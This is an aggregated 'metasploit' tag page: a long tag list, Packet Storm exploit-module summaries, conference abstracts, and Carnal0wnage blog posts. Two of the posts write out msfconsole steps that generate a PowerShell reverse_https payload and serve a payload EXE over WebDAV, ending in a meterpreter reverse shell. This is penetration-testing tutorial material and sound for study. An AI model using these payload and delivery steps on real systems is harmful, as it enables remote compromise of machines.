«
Expand/Collapse
279 items tagged "metasploit"
Related tags:
txt [+],
ruby programming [+],
class [+],
Pentesting [+],
oracle [+],
slides [+],
overflow [+],
escalation [+],
web admin [+],
session [+],
remote [+],
payloads [+],
malicious web [+],
file [+],
exploit [+],
axis [+],
attacker [+],
arbitrary command [+],
version [+],
system [+],
stack buffer [+],
ryan linn tags [+],
portuguese [+],
pivot [+],
penetration [+],
local privilege escalation [+],
linn [+],
information gathering [+],
chris gates [+],
bridge [+],
Support [+],
General [+],
vnc [+],
stack overflow [+],
sneak peak [+],
sneak [+],
remote buffer overflow [+],
php [+],
pdf [+],
nmap [+],
netcat [+],
mario ceballos [+],
log [+],
jboss [+],
java [+],
h.d. moore tags [+],
gui [+],
exploitation [+],
denial of service [+],
d moore [+],
ceballos [+],
based buffer overflow [+],
authors [+],
audio [+],
zabbix [+],
xgo [+],
winlog [+],
windows xp sp3 [+],
windows 2003 sp2 [+],
windows [+],
web authors [+],
vwr [+],
vulnerability assessment [+],
visiwave [+],
victim machine [+],
valid pointer [+],
uploadify [+],
upload [+],
tool [+],
tftp [+],
tag team [+],
system session [+],
system instability [+],
syscall [+],
superuser account [+],
ssh connection [+],
sprintf function [+],
soap server [+],
soap [+],
simatic [+],
siemens simatic s7 [+],
sielco [+],
showreport [+],
setuid [+],
service [+],
s7 300 [+],
routine ends [+],
rest [+],
request [+],
read [+],
pxe server [+],
pxe [+],
privileges [+],
privileged user [+],
privilege escalation vulnerability [+],
plc [+],
passwd [+],
pass [+],
paper [+],
page mentions that [+],
nfr [+],
networker [+],
nessus [+],
multiplayer [+],
meterpreter [+],
metassh [+],
memory [+],
mcafee [+],
manager client [+],
malicious attacker [+],
mail security [+],
linux partition [+],
linux kernel [+],
kernel space [+],
jax ws [+],
java version [+],
hijacking [+],
gimp script [+],
gimp [+],
ftp service [+],
freepbx [+],
file upload [+],
ez shopwner [+],
exe attempts [+],
esva [+],
emc [+],
e mail [+],
directory traversal [+],
diff [+],
denial [+],
default extensions [+],
darknet [+],
cross [+],
command [+],
code [+],
callmenum [+],
bugtraq [+],
basilic [+],
arbitrary code [+],
application lifecycle [+],
appliance [+],
applet [+],
agent [+],
afdjoinleaf [+],
afd [+],
adobe indesign [+],
adobe [+],
administrative privileges [+],
absoluteftp [+],
ExploitsVulnerabilities [+],
framework [+],
metasploit framework [+],
with [+],
wireless access points [+],
windows exploits [+],
viscom [+],
usa [+],
unreal ircd [+],
unreal [+],
unc path [+],
tricks [+],
track [+],
tips and tricks [+],
tips [+],
telephony [+],
tar gz [+],
system privileges [+],
svn [+],
smart phones [+],
shortcut icon [+],
shortcut files [+],
shortcut [+],
server version [+],
serenity audioplayer [+],
security [+],
scanner [+],
released [+],
powershell [+],
post [+],
oracle instances [+],
nbsp [+],
mike kershaw [+],
max moser [+],
matthew weeks [+],
magazine [+],
low [+],
level [+],
issue [+],
ircd [+],
icon [+],
hostile networks [+],
helix server [+],
hacking [+],
ftpd [+],
express tags [+],
evasion [+],
easy [+],
desenvolvendo [+],
daytona [+],
day [+],
danke schon [+],
crossdomain [+],
control [+],
configuration [+],
clubhack [+],
carat [+],
black hat [+],
beta [+],
backdoor [+],
automated configuration [+],
audioplayer [+],
assessment toolkit [+],
aslr [+],
armitage [+],
agentx [+],
Wireless [+],
module [+],
youtube [+],
xxx [+],
xss [+],
win32 exe [+],
win [+],
whooo [+],
weird stuff [+],
webdavtest [+],
webdav [+],
web application [+],
vulnerable systems [+],
vulnerabilidad [+],
vncinject [+],
vnc server [+],
vm machine [+],
user [+],
uri [+],
unmanned aerial vehicles [+],
unbreakable [+],
type [+],
tmp [+],
time [+],
tfe [+],
text shell [+],
test [+],
tcp connection [+],
tcp [+],
target machine [+],
target id [+],
target address [+],
target [+],
talk [+],
tags [+],
tag [+],
subversion client [+],
stopping [+],
standalone application [+],
ssh [+],
speicher [+],
space restrictions [+],
social engineering [+],
smart [+],
slogin [+],
shiz [+],
shikata ga nai [+],
shellcode [+],
shell [+],
service pack 1 [+],
security team [+],
security researchers [+],
script logs [+],
scanning [+],
ryan linn [+],
run [+],
ruby ruby [+],
root [+],
reloaded [+],
relevant section [+],
received [+],
raw ruby [+],
quot [+],
puerto 445 [+],
public options [+],
progresive [+],
product [+],
processor architecture [+],
pro [+],
pre [+],
port [+],
poc [+],
php shell [+],
pgp [+],
pentest [+],
penetration testers [+],
payload [+],
path [+],
password [+],
pack [+],
output options [+],
output [+],
org uk [+],
oracle web applications [+],
oracle databases [+],
open source product [+],
open source implementation [+],
open source code [+],
open ports [+],
old server [+],
oci [+],
ntp [+],
no brainer [+],
nicolas [+],
network time protocol [+],
nbsp nbsp nbsp nbsp nbsp [+],
msfpayload [+],
msfencode [+],
msf [+],
ms10 [+],
moore production [+],
module search [+],
modified version [+],
metasploitable [+],
metasploit project [+],
meta [+],
macro code [+],
long [+],
live [+],
linux distro [+],
linux [+],
lib [+],
ldap service [+],
keyserver [+],
java gui [+],
james lee tags [+],
iusr [+],
introducao [+],
internet explorer [+],
integard [+],
information [+],
index pages [+],
index [+],
http [+],
host port [+],
hey guys [+],
hero dvd [+],
hero [+],
handler [+],
forwarding [+],
fasttrack [+],
exe [+],
exception handler [+],
evasion techniques [+],
euro [+],
ecc [+],
dll [+],
dictionary attack [+],
des [+],
demo [+],
declare [+],
dbms [+],
davaroo [+],
database [+],
darwin [+],
counterattack [+],
command shell [+],
com [+],
cleanup [+],
christian papathanasiou [+],
cadaver [+],
byval [+],
bt4 [+],
blogspot [+],
blah blah [+],
black [+],
basename [+],
auxiliary modules [+],
attack [+],
and [+],
administration tools [+],
Videos [+],
Software [+],
Newbie [+],
Generali [+],
Fixes [+],
Final [+],
Ecke [+],
Discussioni [+],
Discussion [+],
Bugs [+],
Area [+],
Anfnger [+],
whitepaper [+],
ruby [+],
vulnerability [+],
code execution [+],
web [+],
testing [+],
video [+],
command execution [+],
buffer overflow [+],
usbsploit [+],
proof of concept [+],
open source platform [+],
network security professionals [+],
exploits [+],
server [+],
pcap [+],
lnk files [+],
buffer [+],
BackTrack [+],
work,
webserver setup,
webserver,
vmware server,
vmware,
videotutorial,
valid credentials,
tutorial,
text,
test market,
target frame,
system options,
syntax problems,
sp3,
someone,
somebody,
sid,
setup web,
setup,
service pack 3,
scanner module,
root account,
registry,
question,
ocx,
novelliprint,
novell iprint,
noobish,
msfconsole,
maturation,
market,
mac text,
logs,
local network,
lan,
kind,
kernel stack,
internet connectivity,
internet,
internal networks,
intellitamper,
integer,
impersonation,
hotness,
host,
histoire,
guided missiles,
guided,
ftp server,
fast track,
fast,
everything,
easyftp,
drive bys,
docume 1,
directory traversal vulnerability,
della,
dei,
debutant,
core,
clue,
clearev,
chat server,
browser,
borrado,
blip tv,
autopwn,
automatic browser,
authority,
account,
Espace,
Angolo
-
-
16:48
»
Carnal0wnage
Quick and dirty hack to export all your findings/host/services/etc and creds from your metasploit database
Normally you'd do this with a:
workspace myworkspace
db_export -f xml -a /path/to/file.xml
db_export -f pwdump -a /path/to/file.pwdump
This can be tedious if you want to spin down an instance with tons of workspaces on it. So I wrote a quick resource script to get it done. This takes a list of workspaces. I'm sure you can programmatically retrieve the workspaces but I didn't. Code below:
-
-
19:42
»
Carnal0wnage
So I put this out on
twitter but failed to document it for historical reasons/find it when I need it.
I was able to replace the PoC payload with the payload from Metasploit's web delivery and it worked just fine.
original PoC here:
https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302#file-backdoor-sctBelow we can see the replaced payload:
...and receiving the shell after running the command from the command line:
-
-
21:36
»
Packet Storm Security Exploits
This Metasploit module abuses the "RunScript" procedure provided by the SOAP interface of Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript(OSX). The exploit drops the payload on the server and must be removed manually.
-
21:36
»
Packet Storm Security Recent Files
This Metasploit module abuses the "RunScript" procedure provided by the SOAP interface of Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript(OSX). The exploit drops the payload on the server and must be removed manually.
-
21:36
»
Packet Storm Security Misc. Files
This Metasploit module abuses the "RunScript" procedure provided by the SOAP interface of Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript(OSX). The exploit drops the payload on the server and must be removed manually.
-
-
15:29
»
Packet Storm Security Exploits
NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload arbitrary files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130. This Metasploit module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).
-
15:29
»
Packet Storm Security Recent Files
NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload arbitrary files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130. This Metasploit module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).
-
15:29
»
Packet Storm Security Misc. Files
NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload arbitrary files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130. This Metasploit module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).
-
-
17:12
»
Packet Storm Security Exploits
This Metasploit module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.
-
17:12
»
Packet Storm Security Recent Files
This Metasploit module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.
-
17:12
»
Packet Storm Security Misc. Files
This Metasploit module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.
-
-
21:17
»
Packet Storm Security Exploits
This Metasploit module exploits a format string vulnerability in the lg_sprintf function as implemented in liblocal.dll on EMC Networker products. This Metasploit module exploits the vulnerability by using a specially crafted RPC call to the program number 0x5F3DD, version 0x02, and procedure 0x06. This Metasploit module has been tested successfully on EMC Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).
-
21:17
»
Packet Storm Security Recent Files
This Metasploit module exploits a format string vulnerability in the lg_sprintf function as implemented in liblocal.dll on EMC Networker products. This Metasploit module exploits the vulnerability by using a specially crafted RPC call to the program number 0x5F3DD, version 0x02, and procedure 0x06. This Metasploit module has been tested successfully on EMC Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).
-
21:17
»
Packet Storm Security Misc. Files
This Metasploit module exploits a format string vulnerability in the lg_sprintf function as implemented in liblocal.dll on EMC Networker products. This Metasploit module exploits the vulnerability by using a specially crafted RPC call to the program number 0x5F3DD, version 0x02, and procedure 0x06. This Metasploit module has been tested successfully on EMC Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).
-
-
17:00
»
SecuriTeam
Metasploit Framework is prone to a local privilege-escalation vulnerability.
-
-
12:43
»
SecDocs
Authors:
Matthew Weeks Tags:
vulnerability Event:
Black Hat DC 2011 Abstract: In hostile networks, most people hope their con kung-fu is good enough to avoid getting owned. But for everyone who has ever wanted to reverse the attack, not getting owned is not enough. We will see how it is often possible for the intended victim to not only confuse and frustrate the attacker, but actually trade places and own the attacker. This talk will detail vulnerabilities in security tools, how these vulnerabilities were discovered, factors increasing the number of vulnerable systems, how the exploits work, creating cross-platform payloads, and how to defend yourself whether attacking or counterattacking. The audience will be invited to participate as complete exploit code will be released and demonstrated against the Metasploit Framework itself.
-
12:43
»
SecDocs
Authors:
Matthew Weeks Tags:
vulnerability Event:
Black Hat DC 2011 Abstract: In hostile networks, most people hope their con kung-fu is good enough to avoid getting owned. But for everyone who has ever wanted to reverse the attack, not getting owned is not enough. We will see how it is often possible for the intended victim to not only confuse and frustrate the attacker, but actually trade places and own the attacker. This talk will detail vulnerabilities in security tools, how these vulnerabilities were discovered, factors increasing the number of vulnerable systems, how the exploits work, creating cross-platform payloads, and how to defend yourself whether attacking or counterattacking. The audience will be invited to participate as complete exploit code will be released and demonstrated against the Metasploit Framework itself.
-
-
8:36
»
Packet Storm Security Exploits
This Metasploit module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure file or configuration permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload. This will result in a new session when this succeeds. If the module is able to modify the service but does not have permission to start and stop the affected service, the attacker must wait for the system to restart before a session will be created.
-
8:36
»
Packet Storm Security Recent Files
This Metasploit module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure file or configuration permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload. This will result in a new session when this succeeds. If the module is able to modify the service but does not have permission to start and stop the affected service, the attacker must wait for the system to restart before a session will be created.
-
8:36
»
Packet Storm Security Misc. Files
This Metasploit module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure file or configuration permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload. This will result in a new session when this succeeds. If the module is able to modify the service but does not have permission to start and stop the affected service, the attacker must wait for the system to restart before a session will be created.
-
-
16:56
»
Packet Storm Security Exploits
Metasploit versions prior to 4.4 contain a vulnerable 'pcap_log' plugin which, when used with the default settings, creates pcap files in /tmp with predictable file names. This exploit works by hard-linking these filenames to /etc/passwd, then sending a packet with a privileged user entry contained within. This, and all the other packets, are appended to /etc/passwd. Successful exploitation results in the creation of a new superuser account. This Metasploit module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd.
-
16:56
»
Packet Storm Security Recent Files
Metasploit versions prior to 4.4 contain a vulnerable 'pcap_log' plugin which, when used with the default settings, creates pcap files in /tmp with predictable file names. This exploit works by hard-linking these filenames to /etc/passwd, then sending a packet with a privileged user entry contained within. This, and all the other packets, are appended to /etc/passwd. Successful exploitation results in the creation of a new superuser account. This Metasploit module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd.
-
16:56
»
Packet Storm Security Misc. Files
Metasploit versions prior to 4.4 contain a vulnerable 'pcap_log' plugin which, when used with the default settings, creates pcap files in /tmp with predictable file names. This exploit works by hard-linking these filenames to /etc/passwd, then sending a packet with a privileged user entry contained within. This, and all the other packets, are appended to /etc/passwd. Successful exploitation results in the creation of a new superuser account. This Metasploit module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd.
-
6:45
»
SecDocs
Authors:
Chris Gates Tags:
web application Metasploit Event:
Black Hat DC 2011 Abstract: In 2009, Metasploit released a suite of auxiliary modules targeting oracle databases and attacking them via the TNS listener. This year lets beat up on...errr security test Oracle but do it over HTTP/HTTPS. Rather than relying on developers to write bad code lets see what we can do with default content and various unpatched Oracle middleware servers that you’ll commonly run into on penetration tests. We’ll also re-implement the TNS attack against the isqlplus web portal with Metasploit auxiliary modules.
-
-
6:00
»
Carnal0wnage
Quick post, since i mentioned it in the DerbyCon talk, to mention that Metasploit generates PowerShell and PowerShell .net (looks related to
this) payloads.
msf > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf payload(reverse_https) > set LPORT 443
LPORT => 443
msf payload(reverse_https) > generate -t psh -f https-pwrshell.txt
[*] Writing 3566 bytes to https-pwrshell.txt...
msf payload(reverse_https) >
Generates it based on old powersploit code
here. Also a note to mention the 64 bit business I mentioned
here still applies. If you are on x64 you need to call the PowerShell in SYSWOW64 to run 32bit payloads.
PowerShell version
PowerShell .net version
-
-
17:04
»
Packet Storm Security Exploits
This Metasploit module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This Metasploit module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it's own token to avoid causing system instability.
-
17:04
»
Packet Storm Security Recent Files
This Metasploit module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This Metasploit module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it's own token to avoid causing system instability.
-
17:04
»
Packet Storm Security Misc. Files
This Metasploit module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This Metasploit module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it's own token to avoid causing system instability.
-
-
8:30
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability within the XGO.ocx ActiveX Control installed with the HP Application Lifecycle Manager Client. The vulnerability exists in the SetShapeNodeType method, which allows the user to specify memory that will be used as an object, through the node parameter. It allows to control the dereference and use of a function pointer. This Metasploit module has been successfully tested with HP Application Lifecycle Manager 11.50 and requires JRE 6 in order to bypass DEP and ASLR.
-
8:30
»
Packet Storm Security Recent Files
This Metasploit module exploits a vulnerability within the XGO.ocx ActiveX Control installed with the HP Application Lifecycle Manager Client. The vulnerability exists in the SetShapeNodeType method, which allows the user to specify memory that will be used as an object, through the node parameter. It allows to control the dereference and use of a function pointer. This Metasploit module has been successfully tested with HP Application Lifecycle Manager 11.50 and requires JRE 6 in order to bypass DEP and ASLR.
-
8:30
»
Packet Storm Security Misc. Files
This Metasploit module exploits a vulnerability within the XGO.ocx ActiveX Control installed with the HP Application Lifecycle Manager Client. The vulnerability exists in the SetShapeNodeType method, which allows the user to specify memory that will be used as an object, through the node parameter. It allows to control the dereference and use of a function pointer. This Metasploit module has been successfully tested with HP Application Lifecycle Manager 11.50 and requires JRE 6 in order to bypass DEP and ASLR.
-
-
20:52
»
Packet Storm Security Exploits
This Metasploit module abuses the "Command" trap in Zabbix Server to execute arbitrary commands without authentication. By default the Node ID "0" is used, if it doesn't work, the Node ID is leaked from the error message and exploitation retried. According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.
-
20:52
»
Packet Storm Security Recent Files
This Metasploit module abuses the "Command" trap in Zabbix Server to execute arbitrary commands without authentication. By default the Node ID "0" is used, if it doesn't work, the Node ID is leaked from the error message and exploitation retried. According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.
-
20:52
»
Packet Storm Security Misc. Files
This Metasploit module abuses the "Command" trap in Zabbix Server to execute arbitrary commands without authentication. By default the Node ID "0" is used, if it doesn't work, the Node ID is leaked from the error message and exploitation retried. According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.
-
-
19:55
»
Packet Storm Security Exploits
This Metasploit module exploits a command injection vulnerability found in E-Mail Security Virtual Appliance. This Metasploit module abuses the learn-msg.cgi file to execute arbitrary OS commands without authentication. This Metasploit module has been successfully tested on the ESVA_2057 appliance.
-
19:55
»
Packet Storm Security Recent Files
This Metasploit module exploits a command injection vulnerability found in E-Mail Security Virtual Appliance. This Metasploit module abuses the learn-msg.cgi file to execute arbitrary OS commands without authentication. This Metasploit module has been successfully tested on the ESVA_2057 appliance.
-
19:55
»
Packet Storm Security Misc. Files
This Metasploit module exploits a command injection vulnerability found in E-Mail Security Virtual Appliance. This Metasploit module abuses the learn-msg.cgi file to execute arbitrary OS commands without authentication. This Metasploit module has been successfully tested on the ESVA_2057 appliance.
-
-
17:00
»
SecuriTeam
Metasploit Framework is prone to a local privilege-escalation vulnerability.
-
-
17:41
»
Packet Storm Security Exploits
Nmap's man page mentions that "Nmap should never be installed with special privileges (e.g. suid root) for security reasons.." and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This Metasploit module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.
-
17:41
»
Packet Storm Security Recent Files
Nmap's man page mentions that "Nmap should never be installed with special privileges (e.g. suid root) for security reasons.." and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This Metasploit module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.
-
17:41
»
Packet Storm Security Misc. Files
Nmap's man page mentions that "Nmap should never be installed with special privileges (e.g. suid root) for security reasons.." and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This Metasploit module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.
-
-
15:15
»
Packet Storm Security Recent Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
15:15
»
Packet Storm Security Tools
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
15:15
»
Packet Storm Security Misc. Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
14:42
»
Packet Storm Security Recent Files
metaSSH is a session plugin for Metasploit that gives you a meterpreter-like interface over an ssh connection. The author original wrote this code so they could cleanly reverse pivot over ssh from within metasploit. Features include multi-channel, pivoting, post-exploitation module use, and more.
-
14:42
»
Packet Storm Security Tools
metaSSH is a session plugin for Metasploit that gives you a meterpreter-like interface over an ssh connection. The author original wrote this code so they could cleanly reverse pivot over ssh from within metasploit. Features include multi-channel, pivoting, post-exploitation module use, and more.
-
14:42
»
Packet Storm Security Misc. Files
metaSSH is a session plugin for Metasploit that gives you a meterpreter-like interface over an ssh connection. The author original wrote this code so they could cleanly reverse pivot over ssh from within metasploit. Features include multi-channel, pivoting, post-exploitation module use, and more.
-
-
17:19
»
Packet Storm Security Exploits
Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug which can further be leveraged to insert user-controlled data resulting in potential escalation of privileges. Metasploit module included.
-
17:19
»
Packet Storm Security Recent Files
Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug which can further be leveraged to insert user-controlled data resulting in potential escalation of privileges. Metasploit module included.
-
17:19
»
Packet Storm Security Misc. Files
Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug which can further be leveraged to insert user-controlled data resulting in potential escalation of privileges. Metasploit module included.
-
-
11:22
»
Packet Storm Security Exploits
This Metasploit module attempts to authenticate using a hard-coded backdoor password in the Simatic S7-300 PLC and dumps the device memory using system commands.
-
11:22
»
Packet Storm Security Recent Files
This Metasploit module attempts to authenticate using a hard-coded backdoor password in the Simatic S7-300 PLC and dumps the device memory using system commands.
-
11:22
»
Packet Storm Security Misc. Files
This Metasploit module attempts to authenticate using a hard-coded backdoor password in the Simatic S7-300 PLC and dumps the device memory using system commands.
-
-
16:13
»
Packet Storm Security Exploits
This Metasploit module abuses a metacharacter injection vulnerability in the diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary commands as the www-data user account.
-
16:13
»
Packet Storm Security Recent Files
This Metasploit module abuses a metacharacter injection vulnerability in the diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary commands as the www-data user account.
-
16:13
»
Packet Storm Security Misc. Files
This Metasploit module abuses a metacharacter injection vulnerability in the diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary commands as the www-data user account.
-
-
6:00
»
Carnal0wnage
Metasploit comes with
dllhijacker moduleThe current module does not allow you to download exe's, in fact these are specifically blacklisted. This makes sense because that's not what the exploit is for. Anyway, someone asked me if it was possible to download a file (specifically a pre-generated exe) over WebDAV. I know an auxiliary module to be a webdav server has been a
request for awhile, but it looked like the dll_hijacker module could accomplish it. I added a block of code to the process_get function to handle the exe and then removed .exe from the blacklist.
So if LOCALEXE is set to TRUE then serve up the local exe in the path/filename you specify, if not generate an executable based on the payload options (Yes, I realize AV will essentially make this part useless).
The below is a "show options" with nothing set, default is to generate a EXE payload, if you want to set your own local EXE you need to set LOCALEXE to TRUE.
msf exploit(webdav_file_server) > show options
Module options (exploit/windows/dev/webdav_file_server):
Name Current Setting Required Description
---- --------------- -------- -----------
BASENAME policy yes The base name for the listed files.
EXTENSIONS txt yes The list of extensions to generate
LOCALEXE false yes Use a local exe instead of generating one based on payload options
LOCALFILE myexe.exe yes The filename to serve up
LOCALROOT /tmp/ yes The local file path
SHARENAME documents yes The name of the top-level share.
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / yes The URI to use (do not change).
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(webdav_file_server) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_file_server) > set LHOST 192.168.26.129
LHOST => 192.168.26.129
smsf exploit(webdav_file_server) > set LPORT 5555
LPORT => 5555
msf exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.
msf exploit(webdav_file_server) > [*] 192.168.26.1:17904 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents
[*] 192.168.26.1:17904 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17904 PROPFIND /documents/
[*] 192.168.26.1:17904 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17904 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17904 GET => Delivering Generated EXE Payload
**Manually execute the exe**
[*] Sending stage (752128 bytes) to 192.168.26.1
[*] Meterpreter session 1 opened (192.168.26.129:5555 -> 192.168.26.1:17800) at Thu May 17 23:13:29 -0700 2012
Now if you want to serve a local exe
msf exploit(webdav_file_server) > jobs -K
Stopping all jobs...
[*] Server stopped.
msf exploit(webdav_file_server) > set LOCALEXE TRUE
LOCALEXE => TRUE
msf exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.
msf exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents
[*] 192.168.26.1:17870 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17870 PROPFIND /documents/
[*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
I've tested this on windows 7 and windows XP and I've been told this works with IE7 and below but not IE8. I've just been executing it on the command line.
Usage*:
copy \\ip\documents\myexe.exe myexe.exe
You may have to net use first
net use \\ip\documents\ /User:Guest
You'll see windows attempt the request of SMB, fail, then switch to doing the WebDAV thing.
Once the bin is on the box you can exec the bin manually.
*there are a couple of other ways to run this, the guy that asked me to help with all this will have a post on it soon.
code is
HERE in the github repo, be gentle i dont usually do exploit code...
-CG
-
-
22:19
»
Packet Storm Security Exploits
This archive includes two exploits, one metasploit and one not, for the Gimp Script-Fu buffer overflow that affects versions 2.6.11.
-
-
7:58
»
Carnal0wnage
This is a quick blog post based on my slides from the May 2012
NovaHackers Meeting
Two posts got me started looking at PowerShell and its ability to execute shellcode
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.htmland
http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.htmlThe first post talks about executing shellcode and gives the calc.exe example. These examples work on x64 and x86. yay!
The second post talks about doing something more than calc.exe...getting shell whooo hooooo
You can review the code but it only shows a x86/32bit shellcode. This will fail miserably on x64.
I was initially thought it would be an easy fix, just grab an x64 payload from MSF. Problem is there are no x64 http/https payloads...
CG was a sad panda.
This left me with two options:
Suck it up and use an existing x64 payload (like rev_tcp) or just pop calc.exe to prove how awesome i am during pentests
or
Invoke 32 bit PowerShell and run 32 bit shellcode (now we get http/https payloads)
So googling turned up a way to tell PowerShell to use the x86 version even on x64. The solution i used was here:
